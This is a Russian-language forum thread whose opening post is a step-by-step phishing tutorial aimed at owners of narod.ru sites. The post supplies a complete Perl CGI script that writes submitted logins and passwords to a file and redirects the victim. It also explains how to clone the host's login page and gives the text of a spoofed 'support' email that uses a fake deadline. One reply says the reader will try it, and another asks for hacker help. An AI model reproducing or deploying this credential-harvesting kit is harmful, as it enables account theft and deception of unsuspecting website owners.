Интернет магазин GLORYSHOP.RU, товары для здоровья и красоты с доставкой на дом

АвторСообщение
ADMINistrator




Сообщение: 23
Зарегистрирован: 17.11.07
Репутация: 0
ссылка на сообщение  Отправлено: 18.11.07 19:00. Заголовок: Взлом сайта на narod.ru


Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем на хостинге narod.ru(хотя его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать). Начнём. Для проведения нижеописанных действий вам понадобятся:
1. Мозги
2. Руки
3. Хостинг с поддержкой CGI
4. Небольшое знание HTML
Итак ищем жертву. У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа xxx@narod.ru Теперь нагло сдираем face народа. Подправляем его, как надо, вставляем туда форму для подтверждения логина и пароля. И получается примерно следующее:



Ещё надо написать write.cgi:

&GetFormInput;

$name=$field{'name'};
$pass=$field{'pass'};

sub GetFormInput {

(*fval) = @_ if @_ ;
local ($buf);
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
}
else {
$buf=$ENV{'QUERY_STRING'};
}
if ($buf eq "") {
return 0 ;
}
else {
@fval=split(/&/,$buf);
foreach $i (0 .. $#fval){
($name,$val)=split (/=/,$fval[$i],2);
$val=~tr/+/ /;
$val=~ s/%(..)/pack("c",hex($1))/ge;
$name=~tr/+/ /;
$name=~ s/%(..)/pack("c",hex($1))/ge;

if (!defined($field{$name})) {
$field{$name}=$val;
}
else {
$field{$name} .= ",$val";
}
}
}
return 1;
}
open (OUTFILE, ">>pass.txt");
print OUTFILE "$name";
print OUTFILE " $pass";
print OUTFILE " =======END======= ";
close (OUTFILE);
print "Location: http://your_redirect_URL " ;


Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё осталось только назначить кнопке 'Подтвердить' выполнение скрипта, закачать на хостинг и отослать письмо жертве с анонимного мыла от support@narod.yandex.ru вида: "Здравствуйте, ваш сайт пытались взломать и вам срочно не позже чем через 96 часов
надо пройти повторную авторизацию. Идите по ссылке (вот тут жертва и отдаст нам пароль)' А для того, чтобы не было понятно, что ссылка не народовская, пользуй nslookup и тогда ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html. Удачи!!!

Спасибо: 0 
ПрофильЦитата Ответить
Ответов - 3 [только новые]





Не зарегистрирован
Зарегистрирован: 01.01.70
ссылка на сообщение  Отправлено: 19.11.07 08:38. Заголовок: спасибо) как нить по..


спасибо) как нить попробую

Спасибо: 0 
Цитата Ответить



Сообщение: 1
Зарегистрирован: 24.11.07
Репутация: 0

Замечания: привет медвед, прошу не флудить на форуме, за флуд буду карать',
ссылка на сообщение  Отправлено: 24.11.07 16:12. Заголовок: привет..


привет

Спасибо: 0 
ПрофильЦитата Ответить



Сообщение: 1
Зарегистрирован: 25.03.11
Репутация: 0
ссылка на сообщение  Отправлено: 25.03.11 22:42. Заголовок: здравствуйте!


здравствуйте!
не собираюсь никого взламывать
просто мирно общался на сайте знакомств
почти договорился о встрече
как вдруг администрация сайта знакомств заблокировала мой аккаунт!!!
теперь не могу общаться приходится прибегать к помощи хакеров!
пожалуйста подскажете к кому можно обратиться за помощью !!!
большое спасибо!!!

Спасибо: 0 
ПрофильЦитата Ответить
Ответ:
1 2 3 4 5 6 7 8 9
большой шрифт малый шрифт надстрочный подстрочный заголовок большой заголовок видео с youtube.com картинка из интернета картинка с компьютера ссылка файл с компьютера русская клавиатура транслитератор  цитата  кавычки моноширинный шрифт моноширинный шрифт горизонтальная линия отступ точка LI бегущая строка оффтопик свернутый текст

показывать это сообщение только модераторам
не делать ссылки активными
Имя, пароль:      зарегистрироваться    
Тему читают:
- участник сейчас на форуме
- участник вне форума
Все даты в формате GMT  3 час. Хитов сегодня: 1
Права: смайлы да, картинки да, шрифты да, голосования нет
аватары да, автозамена ссылок вкл, премодерация откл, правка нет